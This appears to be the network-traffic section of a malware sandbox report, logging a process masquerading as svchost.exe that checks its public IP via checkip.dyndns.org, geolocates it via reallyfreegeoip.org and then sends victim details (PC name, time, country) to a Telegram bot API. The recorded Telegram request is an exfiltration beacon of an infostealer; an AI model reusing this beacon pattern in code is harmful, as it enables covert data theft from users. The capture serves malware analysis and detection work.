Jan 10, 2025 23:41:11.185091019 CET	745	IN	HTTP/1.1 504 Gateway Time-out Date: Fri, 10 Jan 2025 22:41:11 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 3c99860811106804277a75b0049970d2 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.12	49720	158.101.44.242	80	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:41:11.224464893 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:41:14.828022003 CET	745	IN	HTTP/1.1 504 Gateway Time-out Date: Fri, 10 Jan 2025 22:41:14 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: fc770d6c60ba5796aa404665b5a8e0b9 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2025 23:41:14.832741976 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:41:16.213886023 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 17f97b183e36a7210e93e26b575eae6b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.12	63813	158.101.44.242	80	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:41:16.841214895 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:41:17.748738050 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fa631c0877b7433f6f6e26815037db35 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49711	104.21.80.1	443	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:41:00 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:41:00 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:00 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1863649 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lR3aNA3d0FwlBaK%2Fa5o7peXCpmcrSdMcF0zK%2F5%2B9x2oZH1t2QEnNG2pxQyoEsZXIOIeLbEvmMh0lc6FLCS7Pr%2BmzjB2ttMqD0iPFW9c0TlqmCB2QDW2WIn88fZAqxlYk7%2FJ88z7J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90002c0a2fba0f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1480&rtt_var=560&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1942781&cwnd=231&unsent_bytes=0&cid=6510fed62370c45b&ts=185&x=0"
2025-01-10 22:41:00 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49712	104.21.80.1	443	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:41:01 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 22:41:01 UTC	865	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:01 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1863650 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pED66wxophJlGMe7Bg%2BezyhgB%2Bz8VYrFaxPlk52Q84JeREX%2BHoh9%2BHkmadFWiBHmsrUqE1nfMgslAYo%2BeJm9whEhq8xtqZ454UMHA3MRgE4OKbJgprLg4AT9Wu%2B%2FDRekvrAeO%2F2W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90002c0f4c850f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1508&min_rtt=1507&rtt_var=568&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1923583&cwnd=231&unsent_bytes=0&cid=03d44ce5963599ff&ts=155&x=0"
2025-01-10 22:41:01 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49714	104.21.80.1	443	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:41:02 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:41:02 UTC	851	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:02 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1863651 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbYDnurj8w2f8Q4nVH%2BoXCpjGXiPvDPIkX4ExWT6c6fzrWApiIDgpXHVFX6FTnKOcU9Q2N8OXNEFUXzdsF0WWmw65oOmsphadHZHHiaC71FLx2ZT4TToRaIkn7lM9E43a8KH2xQc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90002c17f9e8c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1602&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1738095&cwnd=244&unsent_bytes=0&cid=baa7e8356f8973e4&ts=171&x=0"
2025-01-10 22:41:02 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49716	104.21.80.1	443	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:41:03 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 22:41:04 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1863653 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yD%2FPZ9SqklSSuXRk79yoxle8VhLo8KwJn%2FAuBWRuJMzkGY6fDsJIvomEEnz2bNdtQenMcr7uQjLInHLRRIK73TqII5%2FN3pIrk61Y2iD%2B7YVyHTsiaiDqeJiTI%2BJsv9ZdyuH0hTCG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90002c1fba1742d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1585&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1810291&cwnd=229&unsent_bytes=0&cid=8ca5074e9ecfe6f9&ts=157&x=0"
2025-01-10 22:41:04 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.12	49718	104.21.80.1	443	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:41:07 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 22:41:07 UTC	865	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1863656 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aMcdGpJvsxaDWg8gcQ56rWMXuIH4m7WtCAyh1GGpl%2Fq7uIJbRHDpWib867%2BektQJ3FEDDM%2FwxcEoW7OKUEJLAeY%2FAPWsx%2FIEMS5A7rwToR4cj%2BWXbLbdP7px%2BTp0Bj%2FMB1Xt7GuJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90002c357eca42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2096&min_rtt=1599&rtt_var=954&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1826141&cwnd=229&unsent_bytes=0&cid=35afdf7a207b5010&ts=186&x=0"
2025-01-10 22:41:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.12	63812	104.21.80.1	443	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:41:16 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:41:16 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1863665 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ghOniRiURZaLAJZDbyds7uAcpqfn77gc%2BdOoEbxl4iW2rCqE5rW342FgfL6xZ66dQ0YbTLpd2up1UXbm02RkSDnv25GfwU7MIBQ09nwACMDgeeP9cLYB4xoFxhtvmhtErDBmx%2FO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90002c6fcd4f43ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1701&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1716637&cwnd=228&unsent_bytes=0&cid=572170fc90099c66&ts=161&x=0"
2025-01-10 22:41:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.12	63814	104.21.80.1	443	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:41:18 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:41:18 UTC	851	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:41:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1863667 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wOj3rdlseUsFu8do28gW%2FIj064tIgFtu6Ilaie8mianbLAx1FnsZB2bMx3xfiomOr8gkrMNeJbhVVtzHEn5isQdh5Y3HdudGhErIb7Fi7DLqvCMMFGvxKjWlkYHJHHx2UbkEViZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90002c797f397d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1983&rtt_var=771&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1394460&cwnd=244&unsent_bytes=0&cid=5505259fb09d5d35&ts=162&x=0"
2025-01-10 22:41:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.12	63815	149.154.167.220	443	6636	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:41:19 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2011/01/2025%20/%2015:13:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 22:41:19 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 22:41:19 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:41:19 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	17:40:54
Start date:	10/01/2025
